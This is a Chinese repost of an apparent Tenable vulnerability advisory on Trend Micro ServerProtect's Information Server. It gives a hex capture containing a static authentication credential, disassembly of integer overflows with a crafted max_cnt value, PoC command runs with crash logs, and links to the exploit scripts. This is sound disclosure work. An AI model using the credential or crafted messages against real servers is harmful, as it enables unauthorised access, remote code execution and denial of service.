点击上方蓝字“Ots安全”一起玩耍
概要
在研究 CVE-2021-36745 的 Nessus 插件覆盖率时,Tenable 在 Microsoft Windows/Novell NetWare 5.8 build 1575 的 Trend Micro ServerProtect 中发现了多个漏洞。
1) 信息服务器静态凭证 – CVE-2022-25329
(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
当命令 2 (CMD_REGISTER) 消息中的控制台类型为 1 时,信息服务器 (EarthAgent.exe) 使用静态凭据执行身份验证。未经身份验证的远程攻击者可以利用此凭据注册/登录到服务器并执行允许的操作注册/认证的客户端控制台。以下 Wireshark 流捕获显示成功的客户端控制台注册:
00000000 21 43 65 87 02 00 00 00 00 00 00 00 00 00 00 00 !Ce...........00000010 7c 01 00 00 e8 03 00 00 00 00 00 00 73 65 72 76 |....... ....服务00000020 65 72 70 72 6f 74 65 63 74 5f 69 6e 66 6f 5f 73 erprotec t_info_s00000030 65 72 76 65 72 2e 70 79 00 00 00 00 00 00 00 00 erver.py ..........00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000060 e8 03 00 00 01 00 00 00 21 00 43 00 52 00 59 00 .... !.CRY00000070 50 00 54 00 21 00 31 00 30 00 38 00 37 00 43 00 PT!.1。0.8.7.C。00000080 38 00 41 00 38 00 35 00 34 00 42 00 42 00 45 00 8.A.8.5。4.BBE00000090 38 00 38 00 44 00 33 00 45 00 35 00 35 00 34 00 8.8.D.3。E.5.5.4。000000A0 37 00 33 00 36 00 46 00 33 00 39 00 00 00 00 00 7.3.6.F. 3.9……000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000170 00 00 0c 00 00 00 00 00 00 00 00 00 ..........00000000 21 43 65 87 02 00 00 00 00 00 00 00 00 00 00 00 !Ce...........00000010 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..........00000020 c8 25 75 00 00 00 00 00 a0 ae 0c 01 00 00 00 00 .%u.......00000030 00 00 00 00 fc bc 0c 01 60 01 00 00 03 00 00 00 .... `.......00000040 63 ab 5c 60 82 10 00 00 fc bc 0c 01 6e ab 5c 60 c.`.... ....n.`00000050 40 fe 6b 00 00 00 00 00 04 84 00 00 cc 04 00 00 @.k.......00000060 00 00 0c 01 60 01 00 00 a4 fd aa 02 a0 ae 0c 01 ....`... ....00000070 10 fd 6b 00 5e d3 2c 77 04 84 00 00 5e d3 2c 77 ..k.^.,w ....^.,w00000080 00 00 00 00 ....
2) 信息服务器命令 73730 整数溢出 – CVE-2022-25330
(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H )
发送到 Information Server 的 TCP 端口 5005 的命令 73730 用于通过查询 HKLMSOFTWAREWOW6432NodeTrendServerProtectCurrentVersionInformationServer<域> 下的远程注册表项来获取远程 Windows 主机上的标准服务器列表<正常服务器名称>。该命令指定远程主机的主机名/IP、用于远程主机的凭据以及要检索的最大标准服务器数。该命令具有以下格式:
// le32 = 32-bit integer in little endian formatstruct header{le32 magic; // must be 0x87654321le32 cmd; // commandle32 error; // error code seen used in responsele32 unk; // num of itemsle32 len; // total message length including this headerle32 cport; // console port, used with client IP to identify// the client consolebyte unk[4];};struct cmd_73730{header hdr; // hdr.cmd must be 73730byte rhost[56]; // remote Windows hostbyte username[128]; // credentials to access thebyte password[128]; // registry on the remote hostle32 max_cnt; // max number of Normal Servers to get};
当 EarthAgent.exe 使用攻击者提供的 max_cnt 分配堆内存来存储从命令中指定的主机上的注册表检索到的数据时,存在整数溢出:
EarthAgent.exe 5.80.0.1575<...snip...>.text:004321D3 lea edx, [esp+2ACh+arg_hdr.max_cnt].text:004321DA push ebx.text:004321DB push edx.text:004321DC push 73730.text:004321E1 mov ecx, esi.text:004321E3 call obj30_RetrieveDataFromBuffer ; return true/false.text:004321E8 test eax, eax.text:004321EA jz loc_4324D0.text:004321F0 mov eax, [esp+2A4h+arg_hdr.max_cnt] ; attacker-controlled.text:004321F7 lea ecx, ds:0[eax*8].text:004321FE sub ecx, eax.text:00432200 shl ecx, 3 ; max_cnt * 56 -> int32 overflow!.text:00432203 push ecx.text:00432204 call operator new(uint)<...snip...>
较大的 max_cnt(即 0x04924925)可以产生小尺寸的堆缓冲区(即 (0x04924925 * 56) & 0xffffffff = 0x18)。
当利用漏洞 1) 时,未经身份验证的远程攻击者可以在命令 73730 中指定他/她自己的 Windows 主机、访问它的凭据和一个大的 max_cnt,并将其发送到 TCP 端口 5005 上的 ServerProtect Information Server 主机。这可能会导致EarthAgent.exe 中基于堆的缓冲区溢出,因为大量攻击者控制的正常服务器名称可以从远程注册表复制到小型堆缓冲区。这可能导致进程终止或远程代码执行。
POC:
python3 serverprotect_info_server_cmd_73730_int32_overflow.py -t <target> -p 5005 -A <attacker-win-host> -U administrator -P <admin_password>Registered a client console OKSending a specially crafted command 73730 messageTraceback (most recent call last):File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 119, in <module>r = read_msg(s)File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 40, in read_msgmsg = recv_msg(sock)File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 22, in recv_msgdata = recvall(sock, 0x1C)File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 12, in recvallpacket = sock.recv(n - len(data))ConnectionResetError: [Errno 104] Connection reset by peer
下面显示了由于堆缓冲区溢出导致的堆损坏:
(1e60.ee8): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=41414141 ebx=010b35e0 ecx=00004141 edx=41414141 esi=00000005 edi=010b0000eip=772ceb37 esp=0356f7fc ebp=0356f9bc iopl=0 nv up ei pl nz ac pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216ntdll!RtlpAllocateHeap+0x397:772ceb37 8b12 mov edx,dword ptr [edx] ds:002b:41414141=????????0:017> k# ChildEBP RetAddr00 0356f9bc 772ce5f0 ntdll!RtlpAllocateHeap+0x39701 0356fa60 772cd35e ntdll!RtlpAllocateHeapInternal+0x128002 0356fa7c 771f87c0 ntdll!RtlAllocateHeap+0x3e03 0356fa9c 009b38d6 msvcrt!malloc+0x90WARNING: Stack unwind information not available. Following frames may be wrong.04 0356fab4 00a068d1 MFC42u!Ordinal823+0x1705 00000000 00000000 MFC42u!Ordinal6135+0x42
3) 信息服务器命令 36885 整数溢出 – CVE-2022-25330
(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H )
处理命令 36885 消息时,EarthAgent.exe 中存在整数溢出情况。当利用漏洞 1) 时,未经身份验证的远程攻击者可以通过向 TCP 端口 5005 发送特制的命令 36885 消息来使进程崩溃或实现远程代码执行。
下图显示了该漏洞:
EarthAgent.exe 5.80.0.1575<...snip...>.text:0042CAA2 add eax, 760h ; attacker-controlled eax,.text:0042CAA2 ; int32 overflow if eax=0xFFFFF8A0.text:0042CAA7 cmp eax, 989680h.text:0042CAAC mov dword ptr [esp+11B8h+allocSize], eax.text:0042CAB0 ja loc_42CBFA.text:0042CAB6 push eax.text:0042CAB7 call operator new(uint).text:0042CABC mov ebx, eax ; int32 overflow -> small heap buffer.text:0042CABC ; allocated.text:0042CABE add esp, 4.text:0042CAC1 test ebx, ebx.text:0042CAC3 jz loc_42CBFA.text:0042CAC9 mov ecx, dword ptr [esp+11B8h+allocSize].text:0042CACD xor eax, eax.text:0042CACF mov edx, ecx.text:0042CAD1 mov edi, ebx.text:0042CAD3 shr ecx, 2.text:0042CAD6 rep stosd.text:0042CAD8 mov ecx, edx.text:0042CADA copy 0x768 bytes to a small.text:0042CADA heap buffer -> heap corruption.text:0042CADA RCE possible?.text:0042CADA push 768h.text:0042CADF and ecx, 3.text:0042CAE2 rep stosb.text:0042CAE4 lea eax, [esp+11BCh+Src] ; 0xC4 bytes of source is.text:0042CAE4 ; attacker-controlled.text:0042CAEB push eax.text:0042CAEC push ebx.text:0042CAED call ds:memmove<...snip...>
POC:
python3 serverprotect_info_server_dos.py -t <target> -p 5005 -c 36885Connection 1Registered a client console OKSending a specially crafted command 36885 messageConnection 2Registered a client console OKSending a specially crafted command 36885 messageConnection 3Traceback (most recent call last):File "/work/0day/serverprotect_info_server_dos.py", line 144, in <module>r = read_msg(s)File "/work/0day/serverprotect_info_server_dos.py", line 40, in read_msgmsg = recv_msg(sock)File "/work/0day/serverprotect_info_server_dos.py", line 22, in recv_msgdata = recvall(sock, 0x1C)File "/work/0day/serverprotect_info_server_dos.py", line 12, in recvallpacket = sock.recv(n - len(data))ConnectionResetError: [Errno 104] Connection reset by peer
下面显示了由于堆缓冲区溢出导致的堆损坏:
0:015> g(6bc.1f60): C++ EH exception - code e06d7363 (first chance)(6bc.1f60): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=011645f0 ebx=00000000 ecx=41414141 edx=00000000 esi=41414141 edi=02a1f848eip=41414141 esp=02a1f61c ebp=02a1f648 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0001024641414141 ?? ???0:005> k# ChildEBP RetAddrWARNING: Frame IP not in any known module. Following frames may be wrong.00 02a1f618 771eb826 0x4141414101 02a1f648 771eb7e5 msvcrt!terminate+0x2602 02a1f678 771eaf94 msvcrt!_inconsistency+0x2c03 02a1f6d4 771eb5b8 msvcrt!FindHandler+0x3db04 02a1f708 771ec1b6 msvcrt!__InternalCxxFrameHandler+0xf705 02a1f744 77316482 msvcrt!__CxxFrameHandler+0x2606 02a1f768 77316454 ntdll!ExecuteHandler2+0x2607 02a1f830 77303a06 ntdll!ExecuteHandler+0x2408 02a1f830 74a335e2 ntdll!KiUserExceptionDispatcher+0x2609 02a1fd54 771eb8f8 KERNELBASE!RaiseException+0x620a 02a1fd98 00a31401 msvcrt!_CxxThrowException+0x680b 02a1fdac 00a38831 MFC42u!Ordinal12590c 02a1fdb0 00a38858 MFC42u!Ordinal1198+0x50d 02a1fdc8 004164e3 MFC42u!Ordinal1167+0x240e 02a1fe98 74a21e76 EarthAgent+0x164e30f 02a1fec0 ffffffff KERNELBASE!CloseHandle+0x2610 02a1ff30 77217e71 0xffffffff11 02a1ff68 77217f31 msvcrt!_callthreadstartex+0x2512 02a1ff70 75190419 msvcrt!_threadstartex+0x6113 02a1ff80 772f72fd KERNEL32!BaseThreadInitThunk+0x1914 02a1ffdc 772f72cd ntdll!__RtlUserThreadStart+0x2f15 02a1ffec 00000000 ntdll!_RtlUserThreadStart+0x1b
4) 信息服务器命令 DoS – CVE-2022-25331
(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)
当分配大小很大时,EarthAgent.exe 中的 C++ new 运算符可能会生成未捕获的异常。当利用漏洞 1) 时,未经身份验证的远程攻击者可以通过向 TCP 端口 5005 发送特制命令消息来使进程崩溃。
以下命令受到影响:4098、8221、8222、8226、12308、12309、36867、36869、36898、41010、41014 和 65549。
下图显示了影响命令 4098 的漏洞:
EarthAgent.exe 5.80.0.1575<...snip...>.text:00423579 lea ecx, ds:0[eax*8].text:00423580 mov [esp+64Ch+arg_hdr.max_cnt], eax.text:00423587 sub ecx, eax.text:00423589 shl ecx, 3 ; 56x.text:0042358C push ecx ; attacker-controlled allocation size,.text:0042358C ; unhandled exception DoS.text:0042358D call operator new(uint)<...snip...>
python3 serverprotect_info_server_dos.py -t <target> -p 5005 -c 4098Connection 1Registered a client console OKSending a specially crafted command 4098 messageConnection 2Registered a client console OKSending a specially crafted command 4098 messageConnection 3Registered a client console OKSending a specially crafted command 4098 messageConnection 4Traceback (most recent call last):File "/work/0day/serverprotect_info_server_dos.py", line 144, in <module>r = read_msg(s)File "/work/0day/serverprotect_info_server_dos.py", line 40, in read_msgmsg = recv_msg(sock)File "/work/0day/serverprotect_info_server_dos.py", line 22, in recv_msgdata = recvall(sock, 0x1C)File "/work/0day/serverprotect_info_server_dos.py", line 12, in recvallpacket = sock.recv(n - len(data))ConnectionResetError: [Errno 104] Connection reset by peer
有关详细信息,请参阅链接的 POC 脚本 serverprotect_info_server_dos.py。
解决方案
根据供应商公告,为相关的 ServerProtect 平台应用推荐的补丁。
概念证明
https://github.com/tenable/poc/blob/master/TrendMicro/ServerProtect/serverprotect_info_server_cmd_73730_int32_overflow.py https://github.com/tenable/poc/blob/master/TrendMicro/ServerProtect/serverprotect_info_server_dos.py
披露时间表
2021 年 10 月 20 日 – 发现漏洞
2021 年 11 月 30 日 – Tenable 向供应商报告了漏洞
2021 年 12 月 1 日 – 供应商请求漏洞报告中引用的 POC 脚本并指定用于加密的密码
2021 年 12 月 3 日 – Tenable 将 POC 脚本发送给使用指定密码压缩和加密的供应商
2021 年 12 月 23 日 – Tenable 要求供应商确认收到 POC 脚本并请求漏洞验证状态
2021 年 12 月 23 日 – 供应商确认收到 POC
2021 年 12 月 23 日 – 验证了供应商确认的漏洞,修复发布的预计时间为 2022 年 1 月
2022 年 2 月 14 日 – Tenable 要求供应商更新发布日期
2022 年 2 月 15 日 – 供应商通知 Tenable,该修复程序将在该周发布,并要求延长披露日期
2022 年 2 月 18 日 – 供应商通知 Tenable,修复程序已发布,他们正在内部协调其安全公告
2022 年 2 月 22 日 – Tenable 拒绝延长披露日期并要求提供 CVE 信息
2022 年 2 月 22 日 – 供应商发布公告
TRA 建议中的所有信息均按“原样”提供,不提供任何形式的保证,包括对适销性和特定用途适用性的默示保证,也不保证完整性、准确性或及时性。个人和组织有责任评估任何实际或潜在安全漏洞的影响。
Tenable 非常重视产品安全。如果您认为您在我们的某个产品中发现了漏洞,请您与我们合作以快速解决该漏洞,以保护客户。Tenable 相信快速响应此类报告、与研究人员保持沟通并在短时间内提供解决方案。
原文始发于微信公众号(Ots安全):Trend Micro ServerProtect 中的多个漏洞
